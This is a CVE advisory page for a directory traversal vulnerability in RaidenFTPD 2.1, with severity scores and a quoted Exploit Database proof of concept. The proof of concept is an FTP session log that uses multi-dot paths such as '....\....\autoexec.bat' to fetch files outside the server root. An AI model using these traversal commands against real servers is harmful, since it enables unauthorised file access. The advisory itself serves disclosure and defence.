CVE-2001-0491 : Detail

CVE-2001-0491

3.43%V4
Network
2001-05-24
02h00 +00:00
2017-12-18
20h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Directory traversal vulnerability in RaidenFTPD Server 2.1 before build 952 allows attackers to access files outside the ftp root via dot dot attacks, such as (1) .... in CWD, (2) .. in NLST, or (3) ... in NLST.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20803

Publication date : 2001-04-24 22h00 +00:00
Author : joetesta
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2655/info Raiden FTPD is susceptible to directory traversal attacks using multiple dots in submitted commands specifying file paths. If the request is properly composed, RaidenFTPD will serve files outside of the intended webroot, potentially compromising the privacy of user data and/or obtaining information which could be used to further compromise the host. > ftp localhost 220-This FTP site is running free version of RaidenFTPD 220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd- site/ 220-Download english version from http://playstation2.idv.tw/raidenftpd/ 220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00) 220-This server is for private use only 220-If you do not have access to this server 220-Please disconnect now 220 Please enter your login name now. User (xxxxxxxx.rh.rit.edu:(none)): jdog 331 Password required for jdog . Password: [really long login banner edited out] 230 User jdog logged in , proceed. ftp> get ....\....\autoexec.bat 200 Port command ok. 150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII 226-�+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+ 226-¦¦½�ñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+ 226-�+½e¬¦�++²¼O / 226 Transfer finished successfully. Data connection closed. ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec. ftp> cd .... 250-ª¦�++²¦-ñU¬+¦í 1323 mb 250 "/.." is current directory.

Products Mentioned

Configuraton 0

Team_johnlong>>Raidenftpd >> Version 2.1_build_947

    References